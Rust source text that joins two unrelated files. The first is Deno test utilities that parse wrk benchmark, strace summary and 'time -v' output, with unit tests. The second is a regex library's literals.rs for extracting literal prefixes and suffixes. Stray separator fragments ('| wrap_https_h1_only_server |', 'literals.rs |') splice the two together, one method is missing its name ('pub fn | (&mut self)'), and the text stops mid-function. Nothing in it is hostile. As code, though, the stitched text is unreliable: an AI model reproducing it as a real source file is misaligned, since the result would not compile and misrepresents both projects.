env_vars.insert(
"DENO_DIR".to_string(),
deno_dir.path().to_string_lossy().to_string(),
);
let pty = pty::create_pty(
&deno_exe_path().to_string_lossy().to_string(),
deno_args,
testdata_path(),
Some(env_vars),
);
action(pty);
}
pub struct WrkOutput {
pub latency: f64,
pub requests: u64,
}
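/// Parses `wrk` benchmark output, extracting requests/sec and the 99th
/// percentile latency normalized to milliseconds.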
pub fn parse_wrk_output(output: &str) -> WrkOutput {
lazy_static! {
static ref REQUESTS_RX: Regex =
Regex::new(r"Requests/sec:\s+(\d+)").unwrap();
static ref LATENCY_RX: Regex =
Regex::new(r"\s+99%(?:\s+(\d+.\d+)([a-z]+))").unwrap();
}
let mut requests = None;
let mut latency = None;
for line in output.lines() {
if requests.is_none() {
if let Some(cap) = REQUESTS_RX.captures(line) {
requests =
Some(str::parse::<u64>(cap.get(1).unwrap().as_str()).unwrap());
}
}
if latency.is_none() {
if let Some(cap) = LATENCY_RX.captures(line) {
let time = cap.get(1).unwrap();
let unit = cap.get(2).unwrap();
latency = Some(
str::parse::<f64>(time.as_str()).unwrap()
* match unit.as_str() {
"ms" => 1.0,
"us" => 0.001,
"s" => 1000.0,
_ => unreachable!(),
},
);
}
}
}
WrkOutput {
requests: requests.unwrap(),
latency: latency.unwrap(),
}
}
#[derive(Debug, Clone, Serialize)]
pub struct StraceOutput {
pub percent_time: f64,
pub seconds: f64,
pub usecs_per_call: Option<u64>,
pub calls: u64,
pub errors: u64,
}
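/// Parses the summary table printed by `strace -c`, keyed by syscall name,
/// with a synthetic "total" entry for the bottom line.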
pub fn parse_strace_output(output: &str) -> HashMap<String, StraceOutput> {
let mut summary = HashMap::new();
// Filter out non-relevant lines. See the error log at
// https://github.com/denoland/deno/pull/3715/checks?check_run_id=397365887
// This is checked in testdata/strace_summary2.out
let mut lines = output
.lines()
.filter(|line| !line.is_empty() && !line.contains("detached ..."));
let count = lines.clone().count();
if count < 4 {
return summary;
}
let total_line = lines.next_back().unwrap();
lines.next_back(); // Drop separator
let data_lines = lines.skip(2);
for line in data_lines {
let syscall_fields = line.split_whitespace().collect::<Vec<_>>();
let len = syscall_fields.len();
let syscall_name = syscall_fields.last().unwrap();
if (5..=6).contains(&len) {
summary.insert(
syscall_name.to_string(),
StraceOutput {
percent_time: str::parse::<f64>(syscall_fields[0]).unwrap(),
seconds: str::parse::<f64>(syscall_fields[1]).unwrap(),
usecs_per_call: Some(str::parse::<u64>(syscall_fields[2]).unwrap()),
calls: str::parse::<u64>(syscall_fields[3]).unwrap(),
errors: if syscall_fields.len() < 6 {
0
} else {
str::parse::<u64>(syscall_fields[4]).unwrap()
},
},
);
}
}
let total_fields = total_line.split_whitespace().collect::<Vec<_>>();
summary.insert(
"total".to_string(),
StraceOutput {
percent_time: str::parse::<f64>(total_fields[0]).unwrap(),
seconds: str::parse::<f64>(total_fields[1]).unwrap(),
usecs_per_call: None,
calls: str::parse::<u64>(total_fields[2]).unwrap(),
errors: str::parse::<u64>(total_fields[3]).unwrap(),
},
);
summary
}
pub fn parse_max_mem(output: &str) -> Option<u64> {
// Takes the output from "time -v" as input and extracts the 'maximum
// resident set size' and returns it in bytes.
for line in output.lines() {
if line
.to_lowercase()
.contains("maximum resident set size (kbytes)")
{
let value = line.split(": ").nth(1).unwrap();
return Some(str::parse::<u64>(value).unwrap() * 1024);
}
}
None
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn parse_wrk_output_1() {
const TEXT: &str = include_str!("./testdata/wrk1.txt");
let wrk = parse_wrk_output(TEXT);
assert_eq!(wrk.requests, 1837);
assert!((wrk.latency - 6.25).abs() < f64::EPSILON);
}
#[test]
fn parse_wrk_output_2() {
const TEXT: &str = include_str!("./testdata/wrk2.txt");
let wrk = parse_wrk_output(TEXT);
assert_eq!(wrk.requests, 53435);
assert!((wrk.latency - 6.22).abs() < f64::EPSILON);
}
#[test]
fn parse_wrk_output_3() {
const TEXT: &str = include_str!("./testdata/wrk3.txt");
let wrk = parse_wrk_output(TEXT);
assert_eq!(wrk.requests, 96037);
assert!((wrk.latency - 6.36).abs() < f64::EPSILON);
}
#[test]
fn strace_parse_1() {
const TEXT: &str = include_str!("./testdata/strace_summary.out");
let strace = parse_strace_output(TEXT);
// first syscall line
let munmap = strace.get("munmap").unwrap();
assert_eq!(munmap.calls, 60);
assert_eq!(munmap.errors, 0);
// line with errors
assert_eq!(strace.get("mkdir").unwrap().errors, 2);
// last syscall line
let prlimit = strace.get("prlimit64").unwrap();
assert_eq!(prlimit.calls, 2);
assert!((prlimit.percent_time - 0.0).abs() < f64::EPSILON);
// summary line
assert_eq!(strace.get("total").unwrap().calls, 704);
assert_eq!(strace.get("total").unwrap().errors, 5);
}
#[test]
fn strace_parse_2() {
const TEXT: &str = include_str!("./testdata/strace_summary2.out");
let strace = parse_strace_output(TEXT);
// first syscall line
let futex = strace.get("futex").unwrap();
assert_eq!(futex.calls, 449);
assert_eq!(futex.errors, 94);
// summary line
assert_eq!(strace.get("total").unwrap().calls, 821);
assert_eq!(strace.get("total").unwrap().errors, 107);
}
#[test]
fn test_wildcard_match() {
let fixtures = vec![
("foobarbaz", "foobarbaz", true),
("[WILDCARD]", "foobarbaz", true),
("foobar", "foobarbaz", false),
("foo[WILDCARD]baz", "foobarbaz", true),
("foo[WILDCARD]baz", "foobazbar", false),
("foo[WILDCARD]baz[WILDCARD]qux", "foobarbazqatqux", true),
("foo[WILDCARD]", "foobar", true),
("foo[WILDCARD]baz[WILDCARD]", "foobarbazqat", true),
// check with different line endings
("foo[WILDCARD]\nbaz[WILDCARD]\n", "foobar\nbazqat\n", true),
(
"foo[WILDCARD]\nbaz[WILDCARD]\n",
"foobar\r\nbazqat\r\n",
true,
),
(
"foo[WILDCARD]\r\nbaz[WILDCARD]\n",
"foobar\nbazqat\r\n",
true,
),
(
"foo[WILDCARD]\r\nbaz[WILDCARD]\r\n",
"foobar\nbazqat\n",
true,
),
(
"foo[WILDCARD]\r\nbaz[WILDCARD]\r\n",
"foobar\r\nbazqat\r\n",
true,
),
];
// Iterate through the fixture lists, testing each one
for (pattern, string, expected) in fixtures {
let actual = wildcard_match(pattern, string);
dbg!(pattern, string, expected);
assert_eq!(actual, expected);
}
}
#[test]
fn test_pattern_match() {
// foo, bar, baz, qux, quux, quuz, corge, grault, garply, waldo, fred, plugh, xyzzy
let wildcard = "[BAR]";
assert!(pattern_match("foo[BAR]baz", "foobarbaz", wildcard));
assert!(!pattern_match("foo[BAR]baz", "foobazbar", wildcard));
let multiline_pattern = "[BAR]
foo:
[BAR]baz[BAR]";
fn multi_line_builder(input: &str, leading_text: Option<&str>) -> String {
// If there is leading text, add a newline so it's on its own line
let head = match leading_text {
Some(v) => format!("{}\n", v),
None => "".to_string(),
};
format!(
"{}foo:
quuz {} corge
grault",
head, input
)
}
// Validate multi-line string builder
assert_eq!(
"QUUX=qux
foo:
quuz BAZ corge
grault",
multi_line_builder("BAZ", Some("QUUX=qux"))
);
// Correct input & leading line
assert!(pattern_match(
multiline_pattern,
&multi_line_builder("baz", Some("QUX=quux")),
wildcard
));
// Correct input & no leading line
assert!(pattern_match(
multiline_pattern,
&multi_line_builder("baz", None),
wildcard
));
// Incorrect input & leading line
assert!(!pattern_match(
multiline_pattern,
&multi_line_builder("garply", Some("QUX=quux")),
wildcard
));
// Incorrect input & no leading line
assert!(!pattern_match(
multiline_pattern,
&multi_line_builder("garply", None),
wildcard
));
}
#[test]
fn max_mem_parse() {
const TEXT: &str = include_str!("./testdata/time.out");
let size = parse_max_mem(TEXT);
assert_eq!(size, Some(120380 * 1024));
}
}
| wrap_https_h1_only_server |
literals.rs | // Copyright 2014-2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use libtww::std::cmp;
use libtww::std::fmt;
use libtww::std::iter;
use libtww::std::mem;
use libtww::std::ops;
use {Expr, CharClass, ClassRange, ByteClass, ByteRange, Repeater};
/// A set of literal byte strings extracted from a regular expression.
///
/// Every member of the set is a `Lit`, which is represented by a `Vec<u8>`.
/// (Notably, it may contain invalid UTF-8.) Every member is said to be either
/// *complete* or *cut*. A complete literal means that it extends until the
/// beginning (or end) of the regular expression. In some circumstances, this
/// can be used to indicate a match in the regular expression.
///
/// Note that a key aspect of literal extraction is knowing when to stop. It is
/// not feasible to blindly extract all literals from a regular expression,
/// even if there are finitely many. For example, the regular expression
/// `[0-9]{10}` has `10^10` distinct literals. For this reason, literal
/// extraction is bounded to some low number by default using heuristics, but
/// the limits can be tweaked.
#[derive(Clone, Eq, PartialEq)]
pub struct Literals {
lits: Vec<Lit>,
limit_size: usize,
limit_class: usize,
}
/// A single member of a set of literals extracted from a regular expression.
///
/// This type has `Deref` and `DerefMut` impls to `Vec<u8>` so that all slice
/// and `Vec` operations are available.
#[derive(Clone, Eq, Ord)]
pub struct Lit {
v: Vec<u8>,
cut: bool,
}
impl Literals {
/// Returns a new empty set of literals using default limits.
pub fn empty() -> Literals {
Literals {
lits: vec![],
limit_size: 250,
limit_class: 10,
}
}
/// Get the approximate size limit (in bytes) of this set.
pub fn limit_size(&self) -> usize {
self.limit_size
}
/// Set the approximate size limit (in bytes) of this set.
///
/// If extracting a literal would put the set over this limit, then
/// extraction stops.
///
/// The new limits will only apply to additions to this set. Existing
/// members remain unchanged, even if the set exceeds the new limit.
pub fn set_limit_size(&mut self, size: usize) -> &mut Literals {
self.limit_size = size;
self
}
/// Get the character class size limit for this set.
pub fn limit_class(&self) -> usize {
self.limit_class
}
/// Limits the size of character (or byte) classes considered.
///
/// A value of `0` prevents all character classes from being considered.
///
/// This limit also applies to case insensitive literals, since each
/// character in the case insensitive literal is converted to a class, and
/// then case folded.
///
/// The new limits will only apply to additions to this set. Existing
/// members remain unchanged, even if the set exceeds the new limit.
pub fn set_limit_class(&mut self, size: usize) -> &mut Literals {
self.limit_class = size;
self
}
/// Returns the set of literals as a slice. Its order is unspecified.
pub fn literals(&self) -> &[Lit] {
&self.lits
}
/// Returns the length of the smallest literal.
///
/// Returns None if there are no literals in the set.
pub fn min_len(&self) -> Option<usize> {
let mut min = None;
for lit in &self.lits {
match min {
None => min = Some(lit.len()),
Some(m) if lit.len() < m => min = Some(lit.len()),
_ => {}
}
}
min
}
/// Returns true if all members in this set are complete.
pub fn all_complete(&self) -> bool {
!self.lits.is_empty() && self.lits.iter().all(|l| !l.is_cut())
}
/// Returns true if any member in this set is complete.
pub fn any_complete(&self) -> bool {
self.lits.iter().any(|lit| !lit.is_cut())
}
/// Returns true if this set contains an empty literal.
pub fn contains_empty(&self) -> bool {
self.lits.iter().any(|lit| lit.is_empty())
}
/// Returns true if this set is empty or if all of its members are empty.
pub fn is_empty(&self) -> bool {
self.lits.is_empty() || self.lits.iter().all(|lit| lit.is_empty())
}
/// Returns a new empty set of literals using this set's limits.
pub fn to_empty(&self) -> Literals {
let mut lits = Literals::empty();
lits.set_limit_size(self.limit_size)
.set_limit_class(self.limit_class);
lits
}
/// Returns the longest common prefix of all members in this set.
pub fn longest_common_prefix(&self) -> &[u8] {
if self.is_empty() {
return &[];
}
let lit0 = &*self.lits[0];
let mut len = lit0.len();
for lit in &self.lits[1..] {
len = cmp::min(len,
lit.iter()
.zip(lit0)
.take_while(|&(a, b)| a == b)
.count());
}
&self.lits[0][..len]
}
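// Illustrative sketch: for {Complete(foobar), Complete(foobaz)} this returns
// b"fooba" (see the lcp9 test below).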
/// Returns the longest common suffix of all members in this set.
pub fn longest_common_suffix(&self) -> &[u8] {
if self.is_empty() {
return &[];
}
let lit0 = &*self.lits[0];
let mut len = lit0.len();
for lit in &self.lits[1..] {
len = cmp::min(len,
lit.iter()
.rev()
.zip(lit0.iter().rev())
.take_while(|&(a, b)| a == b)
.count());
}
&self.lits[0][self.lits[0].len() - len..]
}
/// Returns a new set of literals with the given number of bytes trimmed
/// from the suffix of each literal.
///
/// If any literal would be cut out completely by trimming, then None is
/// returned.
///
/// Any duplicates that are created as a result of this transformation are
/// removed.
pub fn trim_suffix(&self, num_bytes: usize) -> Option<Literals> {
if self.min_len().map(|len| len <= num_bytes).unwrap_or(true) {
return None;
}
let mut new = self.to_empty();
for mut lit in self.lits.iter().cloned() {
let new_len = lit.len() - num_bytes;
lit.truncate(new_len);
lit.cut();
new.lits.push(lit);
}
new.lits.sort();
new.lits.dedup();
Some(new)
}
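// Illustrative sketch: trimming one byte from {Complete(abc), Complete(abd)}
// collapses the set to the single cut literal {Cut(ab)} (see the trim2 test
// below).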
/// Returns a new set of prefixes of this set of literals that are
/// guaranteed to be unambiguous.
///
/// Any substring match with a member of the returned set is guaranteed
/// to never overlap with a substring match of another member of the set
/// at the same starting position.
///
/// Given any two members of the returned set, neither is a substring of
/// the other.
pub fn unambiguous_prefixes(&self) -> Literals {
if self.lits.is_empty() {
return self.to_empty();
}
let mut new = self.to_empty();
'OUTER: for lit1 in &self.lits {
if new.lits.is_empty() {
new.lits.push(lit1.clone());
continue;
}
let mut candidate = lit1.clone();
for lit2 in &mut new.lits {
if lit2.is_empty() {
continue;
}
if &candidate == lit2 {
// If the literal is already in the set, then we can
// just drop it. But make sure that cut literals are
// infectious!
candidate.cut = candidate.cut || lit2.cut;
lit2.cut = candidate.cut;
continue 'OUTER;
}
if candidate.len() <= lit2.len() {
if let Some(i) = position(&candidate, &lit2) {
lit2.truncate(i);
lit2.cut();
candidate.cut();
}
} else {
if let Some(i) = position(&lit2, &candidate) {
candidate.truncate(i);
candidate.cut();
lit2.cut();
}
}
// Oops, the candidate is already represented in the set.
if candidate.is_empty() {
continue 'OUTER;
}
}
new.lits.push(candidate);
}
new.lits.retain(|lit| !lit.is_empty());
new.lits.sort();
new.lits.dedup();
new
}
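// Illustrative sketch: {Complete(abc), Complete(bc)} is ambiguous because
// "bc" occurs inside "abc"; unambiguous_prefixes() resolves this to
// {Cut(a), Cut(bc)} (see the unambiguous4 test below).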
/// Returns a new set of suffixes of this set of literals that are
/// guaranteed to be unambiguous.
///
/// Any substring match with a member of the returned set is guaranteed
/// to never overlap with a substring match of another member of the set
/// at the same ending position.
///
/// Given any two members of the returned set, neither is a substring of
/// the other.
pub fn unambiguous_suffixes(&self) -> Literals {
// This is a touch wasteful...
let mut lits = self.clone();
lits.reverse();
let mut unamb = lits.unambiguous_prefixes();
unamb.reverse();
unamb
}
/// Unions the prefixes from the given expression to this set.
///
/// If prefixes could not be added (for example, this set would exceed its
/// size limits or the set of prefixes from `expr` includes the empty
/// string), then false is returned.
///
/// Note that prefix literals extracted from `expr` are said to be complete
/// if and only if the literal extends from the beginning of `expr` to the
/// end of `expr`.
pub fn union_prefixes(&mut self, expr: &Expr) -> bool {
let mut lits = self.to_empty();
prefixes(expr, &mut lits);
!lits.is_empty() && !lits.contains_empty() && self.union(lits)
}
/// Unions the suffixes from the given expression to this set.
///
/// If suffixes could not be added (for example, this set would exceed its
/// size limits or the set of suffixes from `expr` includes the empty
/// string), then false is returned.
///
/// Note that prefix literals extracted from `expr` are said to be complete
/// if and only if the literal extends from the end of `expr` to the
/// beginning of `expr`.
pub fn union_suffixes(&mut self, expr: &Expr) -> bool {
let mut lits = self.to_empty();
suffixes(expr, &mut lits);
lits.reverse();
!lits.is_empty() && !lits.contains_empty() && self.union(lits)
}
/// Unions this set with another set.
///
/// If the union would cause the set to exceed its limits, then the union
/// is skipped and it returns false. Otherwise, if the union succeeds, it
/// returns true.
pub fn union(&mut self, lits: Literals) -> bool {
if self.num_bytes() + lits.num_bytes() > self.limit_size {
return false;
}
if lits.is_empty() {
self.lits.push(Lit::empty());
} else {
self.lits.extend(lits.lits);
}
true
}
/// Extends this set with another set.
///
/// The set of literals is extended via a cross product.
///
/// If a cross product would cause this set to exceed its limits, then the
/// cross product is skipped and it returns false. Otherwise, if the cross
/// product succeeds, it returns true.
pub fn cross_product(&mut self, lits: &Literals) -> bool {
if lits.is_empty() {
return true;
}
// Check to make sure we stay within our limits.
let mut size_after;
if self.is_empty() || !self.any_complete() {
size_after = self.num_bytes();
for lits_lit in lits.literals() {
size_after += lits_lit.len();
}
} else {
size_after = self.lits.iter().fold(0, |accum, lit| {
accum +
if lit.is_cut() {
lit.len()
} else {
0
}
});
for lits_lit in lits.literals() {
for self_lit in self.literals() {
if !self_lit.is_cut() {
size_after += self_lit.len() + lits_lit.len();
}
}
}
}
if size_after > self.limit_size {
return false;
}
let mut base = self.remove_complete();
if base.is_empty() {
base = vec![Lit::empty()];
}
for lits_lit in lits.literals() {
for mut self_lit in base.clone() {
self_lit.extend(&**lits_lit);
self_lit.cut = lits_lit.cut;
self.lits.push(self_lit);
}
}
true
}
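// Illustrative sketch: crossing {Complete(a), Complete(b)} with
// {Complete(x), Complete(y)} yields {ax, bx, ay, by}; cut members of this
// set are kept as-is, since a cut literal can never be extended.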
/// Extends each literal in this set with the bytes given.
///
/// If the set is empty, then the given literal is added to the set.
///
/// If adding any number of bytes to all members of this set causes a limit
/// to be exceeded, then no bytes are added and false is returned. If a
/// prefix of `bytes` can be fit into this set, then it is used and all
/// resulting literals are cut.
pub fn cross_add(&mut self, bytes: &[u8]) -> bool {
// N.B. This could be implemented by simply calling cross_product with
// a literal set containing just `bytes`, but we can be smarter about
// taking shorter prefixes of `bytes` if they'll fit.
if bytes.is_empty() {
return true;
}
if self.lits.is_empty() {
let i = cmp::min(self.limit_size, bytes.len());
self.lits.push(Lit::new(bytes[..i].to_owned()));
self.lits[0].cut = i < bytes.len();
return !self.lits[0].is_cut();
}
let size = self.num_bytes();
if size + self.lits.len() >= self.limit_size {
return false;
}
let mut i = 1;
while size + (i * self.lits.len()) <= self.limit_size && i < bytes.len() {
i += 1;
}
for lit in &mut self.lits {
if !lit.is_cut() {
lit.extend(&bytes[..i]);
if i < bytes.len() {
lit.cut();
}
}
}
true
}
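// Illustrative sketch: cross_add(b"z") on {Complete(a), Complete(b)} yields
// {Complete(az), Complete(bz)}; if only a shorter prefix of the bytes fits
// under limit_size, that prefix is appended and the literals are cut.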
/// Adds the given literal to this set.
///
/// Returns false if adding this literal would cause the class to be too
/// big.
pub fn add(&mut self, lit: Lit) -> bool {
if self.num_bytes() + lit.len() > self.limit_size {
return false;
}
self.lits.push(lit);
true
}
/// Extends each literal in this set with the character class given.
///
/// Returns false if the character class was too big to add.
pub fn add_char_class(&mut self, cls: &CharClass) -> bool {
self._add_char_class(cls, false)
}
/// Extends each literal in this set with the character class given,
/// writing the bytes of each character in reverse.
///
/// Returns false if the character class was too big to add.
fn add_char_class_reverse(&mut self, cls: &CharClass) -> bool {
self._add_char_class(cls, true)
}
fn _add_char_class(&mut self, cls: &CharClass, reverse: bool) -> bool {
use libtww::std::char;
if self.class_exceeds_limits(cls.num_chars()) {
return false;
}
let mut base = self.remove_complete();
if base.is_empty() {
base = vec![Lit::empty()];
}
for r in cls {
let (s, e) = (r.start as u32, r.end as u32 + 1);
for c in (s..e).filter_map(char::from_u32) {
for mut lit in base.clone() {
let mut bytes = c.to_string().into_bytes();
if reverse {
bytes.reverse();
}
lit.extend(&bytes);
self.lits.push(lit);
}
}
}
true
}
/// Extends each literal in this set with the byte class given.
///
/// Returns false if the byte class was too big to add.
pub fn add_byte_class(&mut self, cls: &ByteClass) -> bool {
if self.class_exceeds_limits(cls.num_bytes()) {
return false;
}
let mut base = self.remove_complete();
if base.is_empty() {
base = vec![Lit::empty()];
}
for r in cls {
let (s, e) = (r.start as u32, r.end as u32 + 1);
for b in (s..e).map(|b| b as u8) {
for mut lit in base.clone() {
lit.push(b);
self.lits.push(lit);
}
}
}
true
}
/// Cuts every member of this set. When a member is cut, it can never
/// be extended.
pub fn | (&mut self) {
for lit in &mut self.lits {
lit.cut();
}
}
/// Reverses all members in place.
pub fn reverse(&mut self) {
for lit in &mut self.lits {
lit.reverse();
}
}
/// Clears this set of all members.
pub fn clear(&mut self) {
self.lits.clear();
}
/// Pops all complete literals out of this set.
fn remove_complete(&mut self) -> Vec<Lit> {
let mut base = vec![];
for lit in mem::replace(&mut self.lits, vec![]) {
if lit.is_cut() {
self.lits.push(lit);
} else {
base.push(lit);
}
}
base
}
/// Returns the total number of bytes in this set.
fn num_bytes(&self) -> usize {
self.lits.iter().fold(0, |accum, lit| accum + lit.len())
}
/// Returns true if a character class with the given size would cause this
/// set to exceed its limits.
///
/// The size given should correspond to the number of items in the class.
fn class_exceeds_limits(&self, size: usize) -> bool {
if size > self.limit_class {
return true;
}
// This is an approximation since codepoints in a char class can encode
// to 1-4 bytes.
let new_byte_count = if self.lits.is_empty() {
size
} else {
self.lits
.iter()
.fold(0, |accum, lit| {
accum +
if lit.is_cut() {
// If the literal is cut, then we'll never add
// anything to it, so don't count it.
0
} else {
(lit.len() + 1) * size
}
})
};
new_byte_count > self.limit_size
}
}
fn prefixes(expr: &Expr, lits: &mut Literals) {
use Expr::*;
match *expr {
Literal { ref chars, casei: false } => {
let s: String = chars.iter().cloned().collect();
lits.cross_add(s.as_bytes());
}
Literal { ref chars, casei: true } => {
for &c in chars {
let cls = CharClass::new(vec![
ClassRange { start: c, end: c },
])
.case_fold();
if !lits.add_char_class(&cls) {
lits.cut();
return;
}
}
}
LiteralBytes { ref bytes, casei: false } => {
lits.cross_add(bytes);
}
LiteralBytes { ref bytes, casei: true } => {
for &b in bytes {
let cls = ByteClass::new(vec![
ByteRange { start: b, end: b },
])
.case_fold();
if !lits.add_byte_class(&cls) {
lits.cut();
return;
}
}
}
Class(ref cls) => {
if !lits.add_char_class(cls) {
lits.cut();
}
}
ClassBytes(ref cls) => {
if !lits.add_byte_class(cls) {
lits.cut();
}
}
Group { ref e, .. } => {
prefixes(&**e, lits);
}
Repeat { ref e, r: Repeater::ZeroOrOne, .. } => {
repeat_zero_or_one_literals(&**e, lits, prefixes);
}
Repeat { ref e, r: Repeater::ZeroOrMore, .. } => {
repeat_zero_or_more_literals(&**e, lits, prefixes);
}
Repeat { ref e, r: Repeater::OneOrMore, .. } => {
repeat_one_or_more_literals(&**e, lits, prefixes);
}
Repeat { ref e, r: Repeater::Range { min, max }, greedy } => {
repeat_range_literals(&**e, min, max, greedy, lits, prefixes);
}
Concat(ref es) if es.is_empty() => {}
Concat(ref es) if es.len() == 1 => prefixes(&es[0], lits),
Concat(ref es) => {
for e in es {
if let StartText = *e {
if !lits.is_empty() {
lits.cut();
break;
}
lits.add(Lit::empty());
continue;
}
let mut lits2 = lits.to_empty();
prefixes(e, &mut lits2);
if !lits.cross_product(&lits2) || !lits2.any_complete() {
// If this expression couldn't yield any literal that
// could be extended, then we need to quit. Since we're
// short-circuiting, we also need to freeze every member.
lits.cut();
break;
}
}
}
Alternate(ref es) => {
alternate_literals(es, lits, prefixes);
}
_ => lits.cut(),
}
}
fn suffixes(expr: &Expr, lits: &mut Literals) {
use Expr::*;
match *expr {
Literal { ref chars, casei: false } => {
let s: String = chars.iter().cloned().collect();
let mut bytes = s.into_bytes();
bytes.reverse();
lits.cross_add(&bytes);
}
Literal { ref chars, casei: true } => {
for &c in chars.iter().rev() {
let cls = CharClass::new(vec![
ClassRange { start: c, end: c },
])
.case_fold();
if !lits.add_char_class_reverse(&cls) {
lits.cut();
return;
}
}
}
LiteralBytes { ref bytes, casei: false } => {
let b: Vec<u8> = bytes.iter().rev().cloned().collect();
lits.cross_add(&b);
}
LiteralBytes { ref bytes, casei: true } => {
for &b in bytes.iter().rev() {
let cls = ByteClass::new(vec![
ByteRange { start: b, end: b },
])
.case_fold();
if !lits.add_byte_class(&cls) {
lits.cut();
return;
}
}
}
Class(ref cls) => {
if !lits.add_char_class_reverse(cls) {
lits.cut();
}
}
ClassBytes(ref cls) => {
if !lits.add_byte_class(cls) {
lits.cut();
}
}
Group { ref e, .. } => {
suffixes(&**e, lits);
}
Repeat { ref e, r: Repeater::ZeroOrOne, .. } => {
repeat_zero_or_one_literals(&**e, lits, suffixes);
}
Repeat { ref e, r: Repeater::ZeroOrMore, .. } => {
repeat_zero_or_more_literals(&**e, lits, suffixes);
}
Repeat { ref e, r: Repeater::OneOrMore, .. } => {
repeat_one_or_more_literals(&**e, lits, suffixes);
}
Repeat { ref e, r: Repeater::Range { min, max }, greedy } => {
repeat_range_literals(&**e, min, max, greedy, lits, suffixes);
}
Concat(ref es) if es.is_empty() => {}
Concat(ref es) if es.len() == 1 => suffixes(&es[0], lits),
Concat(ref es) => {
for e in es.iter().rev() {
if let EndText = *e {
if !lits.is_empty() {
lits.cut();
break;
}
lits.add(Lit::empty());
continue;
}
let mut lits2 = lits.to_empty();
suffixes(e, &mut lits2);
if !lits.cross_product(&lits2) || !lits2.any_complete() {
// If this expression couldn't yield any literal that
// could be extended, then we need to quit. Since we're
// short-circuiting, we also need to freeze every member.
lits.cut();
break;
}
}
}
Alternate(ref es) => {
alternate_literals(es, lits, suffixes);
}
_ => lits.cut(),
}
}
fn repeat_zero_or_one_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
lits: &mut Literals,
mut f: F) {
let (mut lits2, mut lits3) = (lits.clone(), lits.to_empty());
lits3.set_limit_size(lits.limit_size() / 2);
f(e, &mut lits3);
if lits3.is_empty() || !lits2.cross_product(&lits3) {
lits.cut();
return;
}
lits2.add(Lit::empty());
if !lits.union(lits2) {
lits.cut();
}
}
fn repeat_zero_or_more_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
lits: &mut Literals,
mut f: F) {
let (mut lits2, mut lits3) = (lits.clone(), lits.to_empty());
lits3.set_limit_size(lits.limit_size() / 2);
f(e, &mut lits3);
if lits3.is_empty() || !lits2.cross_product(&lits3) {
lits.cut();
return;
}
lits2.cut();
lits2.add(Lit::empty());
if !lits.union(lits2) {
lits.cut();
}
}
fn repeat_one_or_more_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
lits: &mut Literals,
mut f: F) {
f(e, lits);
lits.cut();
}
fn repeat_range_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
min: u32,
max: Option<u32>,
greedy: bool,
lits: &mut Literals,
mut f: F) {
use Expr::*;
if min == 0 {
// This is a bit conservative. If `max` is set, then we could
// treat this as a finite set of alternations. For now, we
// just treat it as `e*`.
f(&Repeat {
e: Box::new(e.clone()),
r: Repeater::ZeroOrMore,
greedy: greedy,
},
lits);
} else {
if min > 0 {
let n = cmp::min(lits.limit_size, min as usize);
let es = iter::repeat(e.clone()).take(n).collect();
f(&Concat(es), lits);
if n < min as usize {
lits.cut();
}
}
if max.map_or(true, |max| min < max) {
lits.cut();
}
}
}
fn alternate_literals<F: FnMut(&Expr, &mut Literals)>(es: &[Expr], lits: &mut Literals, mut f: F) {
let mut lits2 = lits.to_empty();
for e in es {
let mut lits3 = lits.to_empty();
lits3.set_limit_size(lits.limit_size() / 5);
f(e, &mut lits3);
if lits3.is_empty() || !lits2.union(lits3) {
// If we couldn't find suffixes for *any* of the
// alternates, then the entire alternation has to be thrown
// away and any existing members must be frozen. Similarly,
// if the union couldn't complete, stop and freeze.
lits.cut();
return;
}
}
if !lits.cross_product(&lits2) {
lits.cut();
}
}
impl fmt::Debug for Literals {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.debug_struct("Literals")
.field("lits", &self.lits)
.field("limit_size", &self.limit_size)
.field("limit_class", &self.limit_class)
.finish()
}
}
impl Lit {
/// Returns a new complete literal with the bytes given.
pub fn new(bytes: Vec<u8>) -> Lit {
Lit {
v: bytes,
cut: false,
}
}
/// Returns a new complete empty literal.
pub fn empty() -> Lit {
Lit {
v: vec![],
cut: false,
}
}
/// Returns true if this literal was "cut."
pub fn is_cut(&self) -> bool {
self.cut
}
/// Cuts this literal.
pub fn cut(&mut self) {
self.cut = true;
}
}
impl PartialEq for Lit {
fn eq(&self, other: &Lit) -> bool {
self.v == other.v
}
}
impl PartialOrd for Lit {
fn partial_cmp(&self, other: &Lit) -> Option<cmp::Ordering> {
self.v.partial_cmp(&other.v)
}
}
impl fmt::Debug for Lit {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.is_cut() {
write!(f, "Cut({})", escape_unicode(&self.v))
} else {
write!(f, "Complete({})", escape_unicode(&self.v))
}
}
}
impl AsRef<[u8]> for Lit {
fn as_ref(&self) -> &[u8] {
&self.v
}
}
impl ops::Deref for Lit {
type Target = Vec<u8>;
fn deref(&self) -> &Vec<u8> {
&self.v
}
}
impl ops::DerefMut for Lit {
fn deref_mut(&mut self) -> &mut Vec<u8> {
&mut self.v
}
}
fn position(needle: &[u8], mut haystack: &[u8]) -> Option<usize> {
let mut i = 0;
while haystack.len() >= needle.len() {
if needle == &haystack[..needle.len()] {
return Some(i);
}
i += 1;
haystack = &haystack[1..];
}
None
}
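// Illustrative sketch: position(b"bc", b"abcd") == Some(1), while
// position(b"zz", b"abcd") == None.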
fn escape_unicode(bytes: &[u8]) -> String {
let show = match ::libtww::std::str::from_utf8(bytes) {
Ok(v) => v.to_string(),
Err(_) => escape_bytes(bytes),
};
let mut space_escaped = String::new();
for c in show.chars() {
if c.is_whitespace() {
let escaped = if c as u32 <= 0x7F {
escape_byte(c as u8)
} else {
if c as u32 <= 0xFFFF {
format!(r"\u{{{:04x}}}", c as u32)
} else {
format!(r"\U{{{:08x}}}", c as u32)
}
};
space_escaped.push_str(&escaped);
} else {
space_escaped.push(c);
}
}
space_escaped
}
fn escape_bytes(bytes: &[u8]) -> String {
let mut s = String::new();
for &b in bytes {
s.push_str(&escape_byte(b));
}
s
}
fn escape_byte(byte: u8) -> String {
use libtww::std::ascii::escape_default;
